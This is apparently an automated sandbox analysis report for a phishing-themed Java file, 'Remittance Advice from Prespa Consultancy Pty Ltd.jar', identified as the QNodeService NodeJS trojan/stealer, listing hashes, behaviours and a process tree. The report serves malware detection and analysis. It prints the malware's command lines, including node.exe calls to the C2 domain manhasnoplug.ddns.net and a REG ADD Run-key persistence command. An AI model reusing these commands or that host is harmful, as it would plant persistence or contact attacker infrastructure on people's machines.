Analysis
-
max time kernel
45s -
max time network
137s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23-11-2020 00:55
Static task
static1
Behavioral task
behavioral1
Sample
Remittance Advice from Prespa Consultancy Pty Ltd.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Remittance Advice from Prespa Consultancy Pty Ltd.jar
Resource
win10v20201028
General
-
Target
Remittance Advice from Prespa Consultancy Pty Ltd.jar
-
Size
76KB
-
MD5
00fbaeac41cb0a4dbc032fd8593e5ae7
-
SHA1
4749439b523248dabe38e0236fe4dcb77ae55c24
-
SHA256
d0276ecaa9b9c49b3b1d53d5a6fd47288a33e626d6255a476c624d86dccf2fad
-
SHA512
9e6fc3e8b5cf6a31b90c624d4c47240aed90e613c508640855585033a83ca3e8b4b5b67bc469a049652968da02fa5f7390f9c1f3e828dfc26c8ea7b5ee98fc89
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2896 node.exe 3228 node.exe 900 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\5ff9ec49-7764-45c2-9528-c05b5d236334 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001aba0-177.dat js behavioral2/files/0x000100000001aba0-180.dat js behavioral2/files/0x000100000001aba0-184.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2896 node.exe 2896 node.exe 2896 node.exe 2896 node.exe 3228 node.exe 3228 node.exe 3228 node.exe 3228 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe 900 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 636 wrote to memory of 3644 636 java.exe 76 PID 636 wrote to memory of 3644 636 java.exe 76 PID 3644 wrote to memory of 2896 3644 javaw.exe 80 PID 3644 wrote to memory of 2896 3644 javaw.exe 80 PID 2896 wrote to memory of 3228 2896 node.exe 82 PID 2896 wrote to memory of 3228 2896 node.exe 82 PID 3228 wrote to memory of 900 3228 node.exe 83 PID 3228 wrote to memory of 900 3228 node.exe 83 PID 900 wrote to memory of 3868 900 node.exe 85 PID 900 wrote to memory of 3868 900 node.exe 85 PID 3868 wrote to memory of 3724 3868 cmd.exe 86 PID 3868 wrote to memory of 3724 3868 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Remittance Advice from Prespa Consultancy Pty Ltd.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2693ee72.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js --hub-domain manhasnoplug.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js --hub-domain manhasnoplug.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5ff9ec49-7764-45c2-9528-c05b5d236334" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5ff9ec49-7764-45c2-9528-c05b5d236334" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3724
-
-
-
-
-
-